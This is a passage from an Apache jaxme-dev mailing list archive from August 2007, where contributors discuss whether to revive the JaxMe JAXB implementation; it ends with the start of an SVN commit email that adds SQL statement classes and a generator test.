? <br clear="all"><br>-- <br>Thanks<br><span class="sg">- Mohammad Nour </span></blockquote></div><br><br clear="all"><br>-- <br>Thanks<br>- Mohammad Nour ------=_Part_87807_1842513.1187521284819-- From [email protected] Sun Aug 19 11:40:03 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91294 invoked from network); 19 Aug 2007 11:40:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 11:40:02 -0000 Received: (qmail 71863 invoked by uid 500); 19 Aug 2007 11:39:59 -0000 Delivered-To: [email protected] Received: (qmail 71840 invoked by uid 500); 19 Aug 2007 11:39:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 71831 invoked by uid 99); 19 Aug 2007 11:39:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 04:39:59 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO vhost.badgers-in-foil.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 11:39:54 +0000 Received: from dave by vhost.badgers-in-foil.co.uk with local (Exim 4.63) (envelope-from <[email protected]>) id 1IMj7y-00007S-QB for [email protected]; Sun, 19 Aug 2007 11:39:30 +0000 Date: Sun, 19 Aug 2007 11:39:30 +0000 From: David Holroyd <[email protected]> To: [email protected] Subject: Re: Status of the project Message-ID: <[email protected]> Mail-Followup-To: [email protected] References: <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.5.13 (2006-08-11) X-SA-Exim-Connect-IP: <locally generated> X-SA-Exim-Mail-From: [email protected] X-SA-Exim-Scanned: No (on vhost.badgers-in-foil.co.uk); SAEximRunCond expanded to false X-Virus-Checked: Checked by ClamAV on apache.org On 8/18/07, Mohammad Nour El-Din <[email protected]> wrote: > If you would please I would like to know the status of the project, the > latest news on your site back to October-2006, but the dev list still have > new messages till these days. The project still alive or not. And why people > from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation While I don't speak for Jochen, he did recently say this of his involvement in the project, http://marc.info/?l=jaxme-dev&m=118349189125674&w=2 ta, dave -- http://david.holroyd.me.uk/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Aug 19 11:53:01 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97202 invoked from network); 19 Aug 2007 11:53:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 11:53:00 -0000 Received: (qmail 75745 invoked by uid 500); 19 Aug 2007 11:52:57 -0000 Delivered-To: [email protected] Received: (qmail 75717 invoked by uid 500); 19 Aug 2007 11:52:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 75708 invoked by uid 99); 19 Aug 2007 11:52:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 04:52:57 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 11:52:53 +0000 Received: by wr-out-0506.google.com with SMTP id 76so628617wra for <[email protected]>; Sun, 19 Aug 2007 04:52:32 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Yfci6jP9b6xm9GzuqAhzq2PC1bw63lj7VPD3inhVM1mfmSWiOLsOUB18Pg9tAzhEXvxb5D8m8yTLUC+q3w9rVhVaXvNxRBda38PG1MjTwAFfR+ZtA4bfdjHMLbNAJ0o3G6axWCwZ6qOg/FAYX1P2F3UW6W1/S7eElOi0DUhmQSU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=HCbt0xLS29ZAWxZd10ew0MJwfC9vH0pLrdp8S6Ta+oCgkZ9/B7fNxBAcVLIpyhVIDkfesfOjNnEb58rQkUHtj6qLtLLvSEK/nx1+qLlvcxvN14LitnJgCyCF9egXazdURNbzG/xi8kQ/M0stCYJIi1y2XO2RlaZI5SQGAS15ICA= Received: by 161.129.204.104 with SMTP id d13mr5087044agd.1187524352331; Sun, 19 Aug 2007 04:52:32 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 19 Aug 2007 04:52:32 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 19 Aug 2007 14:52:32 +0300 From: "Mohammad Nour El-Din" <[email protected]> To: [email protected] Subject: Re: Status of the project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_87923_21407619.1187524352254" References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_87923_21407619.1187524352254 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Can't we bring to life again, I mean the license issue still exist as you mentioned on your site, beside we can add new ideas like generating JavaScript code to parse the XML Documents as a result of Ajax calls, which is missing exept in JSCastor I think . I think that there is a great job in there and we can't leave it dying :) . On 8/19/07, David Holroyd <[email protected]> wrote: > > On 8/18/07, Mohammad Nour El-Din <[email protected]> wrote: > > If you would please I would like to know the status of the project, > the > > latest news on your site back to October-2006, but the dev list still > have > > new messages till these days. The project still alive or not. And why > people > > from OpenEJB and Geronimo use the sun RI of JAXB and not your > implementation > > While I don't speak for Jochen, he did recently say this of his > involvement in the project, > > http://marc.info/?l=jaxme-dev&m=118349189125674&w=2 > > > ta, > dave > > -- > http://david.holroyd.me.uk/ > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Thanks - Mohammad Nour ------=_Part_87923_21407619.1187524352254 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Can&#39;t we bring to life again, I mean the license issue still exist as you mentioned on your site, beside we can add new ideas like generating JavaScript code to parse the XML Documents as a result of Ajax calls, which is missing exept in JSCastor I think . I think that there is a great job in there and we can&#39;t leave it dying :) . <br><br><div><span class="gmail_quote">On 8/19/07, <b class="gmail_sendername">David Holroyd</b> &lt;<a href="mailto:[email protected]">[email protected]</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> On 8/18/07, Mohammad Nour El-Din &lt;<a href="mailto:[email protected]">[email protected]</a>&gt; wrote:<br>&gt;&nbsp;&nbsp; If you would please I would like to know the status of the project, the<br>&gt; latest news on your site back to October-2006, but the dev list still have <br>&gt; new messages till these days. The project still alive or not. And why people<br>&gt; from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation<br><br>While I don&#39;t speak for Jochen, he did recently say this of his <br>involvement in the project,<br><br>&nbsp;&nbsp;<a href="http://marc.info/?l=jaxme-dev&amp;m=118349189125674&amp;w=2">http://marc.info/?l=jaxme-dev&amp;m=118349189125674&amp;w=2</a><br><br><br>ta,<br>dave<br><br>--<br><a href="http://david.holroyd.me.uk/"> http://david.holroyd.me.uk/</a><br><br>---------------------------------------------------------------------<br>To unsubscribe, e-mail: <a href="mailto:[email protected]">[email protected] </a><br>For additional commands, e-mail: <a href="mailto:[email protected]">[email protected]</a><br><br></blockquote></div><br><br clear="all"><br>-- <br>Thanks<br>- Mohammad Nour ------=_Part_87923_21407619.1187524352254-- From [email protected] Sun Aug 19 13:32:42 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30593 invoked from network); 19 Aug 2007 13:32:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 13:32:41 -0000 Received: (qmail 46696 invoked by uid 500); 19 Aug 2007 13:32:39 -0000 Delivered-To: [email protected] Received: (qmail 46682 invoked by uid 500); 19 Aug 2007 13:32:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 46673 invoked by uid 99); 19 Aug 2007 13:32:39 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 06:32:39 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 13:32:34 +0000 Received: by wr-out-0506.google.com with SMTP id 76so639891wra for <[email protected]>; Sun, 19 Aug 2007 06:32:14 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=BdObNROPlGQHLO5T7iZCIpZrzErS8KlNsdL05bmynXYGs0v/fUFHymwvLHeVOs/G7QMdmbKLsCt1I99HMIf7ssvIY780UbF5Bpy9fcvzbX7XwT9+DXNYTjwLfhyedtcxxrUWpQQEVQqH7FZImtQVXo4Mq3plfDOKUsRMiyz2/NU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=FGSSlXI/wu4L+7jNgOJc9MYThQexbM9Gm6vtu3BNwy1rBK832lMhpJzXMgakGPDDx1TZ8ABITkbLrDJ3bD0FlSt1x1XPYhjmdUu7rFijQnOkT/hsHlM1uuHyJR7Tp8Q009nANO+nJVXHQAtApbSjG3vCsPTMngnxeon7c0a2PQ8= Received: by 161.129.204.104 with SMTP id m5mr7366898agb.1187530333921; Sun, 19 Aug 2007 06:32:13 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 19 Aug 2007 06:32:13 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 19 Aug 2007 16:32:13 +0300 From: "Mohammad Nour El-Din" <[email protected]> To: [email protected] Subject: Re: Status of the project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_88227_20089859.1187530333462" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_88227_20089859.1187530333462 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hey come on guys :) . Seems u don't like the idea :) . On 8/19/07, Mohammad Nour El-Din <[email protected]> wrote: > > Can't we bring to life again, I mean the license issue still exist as you > mentioned on your site, beside we can add new ideas like generating > JavaScript code to parse the XML Documents as a result of Ajax calls, which > is missing exept in JSCastor I think . I think that there is a great job in > there and we can't leave it dying :) . > > On 8/19/07, David Holroyd <[email protected]> wrote: > > > > On 8/18/07, Mohammad Nour El-Din <[email protected]> wrote: > > > If you would please I would like to know the status of the project, > > the > > > latest news on your site back to October-2006, but the dev list still > > have > > > new messages till these days. The project still alive or not. And why > > people > > > from OpenEJB and Geronimo use the sun RI of JAXB and not your > > implementation > > > > While I don't speak for Jochen, he did recently say this of his > > involvement in the project, > > > > http://marc.info/?l=jaxme-dev&m=118349189125674&w=2 > > > > > > ta, > > dave > > > > -- > > http://david.holroyd.me.uk/ > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [email protected] > > For additional commands, e-mail: [email protected] > > > > > > > -- > Thanks > - Mohammad Nour -- Thanks - Mohammad Nour ------=_Part_88227_20089859.1187530333462 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hey come on guys :) . Seems u don&#39;t like the idea :) .<br><br><div><span class="gmail_quote">On 8/19/07, <b class="gmail_sendername">Mohammad Nour El-Din</b> &lt;<a href="mailto:[email protected]">[email protected] </a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Can&#39;t we bring to life again, I mean the license issue still exist as you mentioned on your site, beside we can add new ideas like generating JavaScript code to parse the XML Documents as a result of Ajax calls, which is missing exept in JSCastor I think . I think that there is a great job in there and we can&#39;t leave it dying :) . <div><span class="e" id="q_1147df798e7d1577_1"><br><br><div><span class="gmail_quote">On 8/19/07, <b class="gmail_sendername">David Holroyd</b> &lt;<a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> [email protected]</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> On 8/18/07, Mohammad Nour El-Din &lt;<a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">[email protected]</a>&gt; wrote:<br>&gt;&nbsp;&nbsp; If you would please I would like to know the status of the project, the <br>&gt; latest news on your site back to October-2006, but the dev list still have <br>&gt; new messages till these days. The project still alive or not. And why people<br>&gt; from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation<br><br>While I don&#39;t speak for Jochen, he did recently say this of his <br>involvement in the project,<br><br>&nbsp;&nbsp;<a href="http://marc.info/?l=jaxme-dev&amp;m=118349189125674&amp;w=2" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://marc.info/?l=jaxme-dev&amp;m=118349189125674&amp;w=2 </a><br><br><br>ta,<br>dave<br><br>--<br><a href="http://david.holroyd.me.uk/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> http://david.holroyd.me.uk/</a><br><br>---------------------------------------------------------------------<br>To unsubscribe, e-mail: <a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> [email protected] </a><br>For additional commands, e-mail: <a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">[email protected]</a><br><br></blockquote></div><br> <br clear="all"><br></span></div>-- <br>Thanks<br><span class="sg">- Mohammad Nour </span></blockquote></div><br><br clear="all"><br>-- <br>Thanks<br>- Mohammad Nour ------=_Part_88227_20089859.1187530333462-- From [email protected] Sun Aug 19 14:26:00 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44194 invoked from network); 19 Aug 2007 14:25:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 14:25:59 -0000 Received: (qmail 83525 invoked by uid 500); 19 Aug 2007 14:25:57 -0000 Delivered-To: [email protected] Received: (qmail 83494 invoked by uid 500); 19 Aug 2007 14:25:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 83485 invoked by uid 99); 19 Aug 2007 14:25:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 07:25:56 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 14:25:51 +0000 Received: by wx-out-0506.google.com with SMTP id h29so1016827wxd for <[email protected]>; Sun, 19 Aug 2007 07:25:30 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=I84bwPwQpzbTQIZ2xc1HvriTyTpnayGFzcnA3LKFk9tu/cHlJTpRuCT3wtenJBhpxghe4R5gFzkev1Db22W59wso/vIPaGz0H4DKnrYaKQ6uTrHdL9Tl+SGpycQX8DikVmipJoFfhww5CtnidSNuoQHSPWJvcZAaRIfbRpbxRB8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=J6wBel8cLLC7I3zBlpo1VtL6k0TEy1KA8DgvGMhsRJdtVwEV4IE3l0MZoo6kc8RDIUfmERu/gLXySZOW8Xy4vYsI3asQQA9qF3CjJAAdehcJL9a/jTZvORgwdRRo5yL2SYF4ELUYxiKcLP8OTO8WFWH4CFR90JwWoyP/SVkCXbg= Received: by 161.129.204.104 with SMTP id v11mr8802442wxv.1187533529007; Sun, 19 Aug 2007 07:25:29 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 19 Aug 2007 07:25:28 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 19 Aug 2007 16:25:28 +0200 From: "=?ISO-8859-1?Q?Jose_Luis_Huertas_Fern=E1ndez?=" <[email protected]> To: [email protected] Subject: Re: Status of the project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_143136_8435187.1187533528947" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_143136_8435187.1187533528947 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello guys, I'm working now to solve some issues with Jaxme, and I'm willing to keep working on it in the future, so you can count on me as a new developer. I'm still understanding the codebase, and I'm not able to give much help in the list yet but I hope I will be able soon. I'm sure more people are willing to support this project to keep it growing, just wait until they read this messages on monday ;) I think the project has a niche where it fits better than Sun RI, and it would be a pity if we let it die: - Projects that are still tied to pre-Java 5 VMs (lots of them in my experience). We should work on this issue, because it seems that the most up to date code in the SVN is now Java5 dependant. - Organizations that prefers Apache license to CDDL. - JaxMe, while compliant with JAXB specification, seems to be more extensible than Sun RI. Best regards, Jose Luis Huertas. 2007/8/19, Mohammad Nour El-Din <[email protected]>: > > Hey come on guys :) . Seems u don't like the idea :) . > > On 8/19/07, Mohammad Nour El-Din <[email protected] > wrote: > > > > Can't we bring to life again, I mean the license issue still exist as > > you mentioned on your site, beside we can add new ideas like generating > > JavaScript code to parse the XML Documents as a result of Ajax calls, which > > is missing exept in JSCastor I think . I think that there is a great job in > > there and we can't leave it dying :) . > > > > On 8/19/07, David Holroyd < [email protected]> wrote: > > > > > > On 8/18/07, Mohammad Nour El-Din <[email protected]> wrote: > > > > If you would please I would like to know the status of the > > > project, the > > > > latest news on your site back to October-2006, but the dev list > > > still have > > > > new messages till these days. The project still alive or not. And > > > why people > > > > from OpenEJB and Geronimo use the sun RI of JAXB and not your > > > implementation > > > > > > While I don't speak for Jochen, he did recently say this of his > > > involvement in the project, > > > > > > http://marc.info/?l=jaxme-dev&m=118349189125674&w=2 > > > > > > > > > ta, > > > dave > > > > > > -- > > > http://david.holroyd.me.uk/ > > > > > > --------------------------------------------------------------------- > > > To unsubscribe, e-mail: [email protected] > > > For additional commands, e-mail: [email protected] > > > > > > > > > > > > -- > > Thanks > > - Mohammad Nour > > > > > -- > Thanks > - Mohammad Nour ------=_Part_143136_8435187.1187533528947 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello guys, I&#39;m working now to solve some issues with Jaxme, and I&#39;m willing to keep working on it in the future, so you can count on me as a new developer.<br><br>I&#39;m still understanding the codebase, and I&#39;m not able to give much help in the list yet but I hope I will be able soon. <br><br>I&#39;m sure more people are willing to support this project to keep it growing, just wait until they read this messages on monday ;)<br><br>I think the project has a niche where it fits better than Sun RI, and it would be a pity if we let it die: <br><br>- Projects that are still tied to pre-Java 5 VMs (lots of them in my experience). We should work on this issue, because it seems that the most up to date code in the SVN is now Java5 dependant.<br>- Organizations that prefers Apache license to CDDL. <br>- JaxMe, while compliant with JAXB specification, seems to be more extensible than Sun RI.<br><br>Best regards, <br><br>Jose Luis Huertas.<br><br><div><span class="gmail_quote">2007/8/19, Mohammad Nour El-Din &lt;<a href="mailto:[email protected]"> [email protected]</a>&gt;:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Hey come on guys :) . Seems u don&#39;t like the idea :) . <div><span class="e" id="q_1147e534db267098_1"><br><br><div><span class="gmail_quote">On 8/19/07, <b class="gmail_sendername">Mohammad Nour El-Din</b> &lt;<a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> [email protected] </a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Can&#39;t we bring to life again, I mean the license issue still exist as you mentioned on your site, beside we can add new ideas like generating JavaScript code to parse the XML Documents as a result of Ajax calls, which is missing exept in JSCastor I think . I think that there is a great job in there and we can&#39;t leave it dying :) . <div><span><br><br><div><span class="gmail_quote">On 8/19/07, <b class="gmail_sendername">David Holroyd</b> &lt;<a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> [email protected]</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> On 8/18/07, Mohammad Nour El-Din &lt;<a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">[email protected]</a>&gt; wrote:<br>&gt;&nbsp;&nbsp; If you would please I would like to know the status of the project, the <br>&gt; latest news on your site back to October-2006, but the dev list still have <br>&gt; new messages till these days. The project still alive or not. And why people<br>&gt; from OpenEJB and Geronimo use the sun RI of JAXB and not your implementation<br><br>While I don&#39;t speak for Jochen, he did recently say this of his <br>involvement in the project,<br><br>&nbsp;&nbsp;<a href="http://marc.info/?l=jaxme-dev&amp;m=118349189125674&amp;w=2" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://marc.info/?l=jaxme-dev&amp;m=118349189125674&amp;w=2 </a><br><br><br>ta,<br>dave<br><br>--<br><a href="http://david.holroyd.me.uk/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> http://david.holroyd.me.uk/</a><br><br>---------------------------------------------------------------------<br>To unsubscribe, e-mail: <a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"> [email protected] </a><br>For additional commands, e-mail: <a href="mailto:[email protected]" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">[email protected]</a><br><br></blockquote></div><br> <br clear="all"><br></span></div>-- <br>Thanks<br><span>- Mohammad Nour </span></blockquote></div><br><br clear="all"><br></span></div>-- <br>Thanks<br><span class="sg">- Mohammad Nour </span></blockquote></div><br> ------=_Part_143136_8435187.1187533528947-- From [email protected] Mon Aug 20 08:22:16 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55694 invoked from network); 20 Aug 2007 08:22:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 08:22:15 -0000 Received: (qmail 59545 invoked by uid 500); 20 Aug 2007 08:22:12 -0000 Delivered-To: [email protected] Received: (qmail 59516 invoked by uid 500); 20 Aug 2007 08:22:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 59507 invoked by uid 500); 20 Aug 2007 08:22:12 -0000 Delivered-To: [email protected] Received: (qmail 59503 invoked by uid 99); 20 Aug 2007 08:22:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 01:22:12 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 08:22:12 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id AB5951A981A; Mon, 20 Aug 2007 01:21:52 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r567590 - in /webservices/jaxme/branches/b0_5: .settings/ src/jaxme/org/apache/ws/jaxme/junit/ src/js/org/apache/ws/jaxme/sqls/ src/js/org/apache/ws/jaxme/sqls/impl/ src/js/org/apache/ws/jaxme/sqls/junit/ Date: Mon, 20 Aug 2007 08:21:50 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: jochen Date: Mon Aug 20 01:21:49 2007 New Revision: 567590 URL: http://svn.apache.org/viewvc?rev=567590&view=rev Log: (empty) Added: webservices/jaxme/branches/b0_5/.settings/org.eclipse.core.resources.prefs webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/IntersectionStatement.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/MinusStatement.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SelectCombinationStatement.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/UnionStatement.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/IntersectionStatementImpl.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/MinusStatementImpl.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SelectCombinationStatementImpl.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/UnionStatementImpl.java Modified: webservices/jaxme/branches/b0_5/src/jaxme/org/apache/ws/jaxme/junit/BindingsTest.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SQLFactory.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/ColumnImpl.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLFactoryImpl.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLGeneratorImpl.java webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/junit/CreateTest.java Added: webservices/jaxme/branches/b0_5/.settings/org.eclipse.core.resources.prefs URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/.settings/org.eclipse.core.resources.prefs?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/.settings/org.eclipse.core.resources.prefs (added) +++ webservices/jaxme/branches/b0_5/.settings/org.eclipse.core.resources.prefs Mon Aug 20 01:21:49 2007 @@ -0,0 +1,3 @@ +#Fri Apr 13 22:08:28 CEST 2007 +eclipse.preferences.version=1 +encoding//src/test/jaxb/enumeration.xsd=UTF8 Modified: webservices/jaxme/branches/b0_5/src/jaxme/org/apache/ws/jaxme/junit/BindingsTest.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/jaxme/org/apache/ws/jaxme/junit/BindingsTest.java?rev=567590&r1=567589&r2=567590&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/jaxme/org/apache/ws/jaxme/junit/BindingsTest.java (original) +++ webservices/jaxme/branches/b0_5/src/jaxme/org/apache/ws/jaxme/junit/BindingsTest.java Mon Aug 20 01:21:49 2007 @@ -61,4 +61,22 @@ impFoo.setRequiredLong(1L); impFoo.setOptionalLong(new Long(1)); } + + /** + * Tests running the generator with a binding file. + */ + public void testDatmlRaw() throws Exception { + try { + Generator g = new GeneratorImpl(); + g.setTargetDirectory(new File("build/tests/datml/src")); + g.setResourceTargetDirectory(new File("build/tests/datml/src")); + g.addBindings(new InputSource(new File("src/test/jaxb/datml-raw-de-2_0.jxb").toURI().toURL().toExternalForm())); + SchemaReader sr = new JAXBSchemaReader(); + sr.setGenerator(g); + g.setSchemaReader(sr); + g.generate(new File("src/test/jaxb/datml-raw-de-2_0.foo")); + } catch (Throwable t) { + t.printStackTrace(); + } + } } Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/IntersectionStatement.java URL: 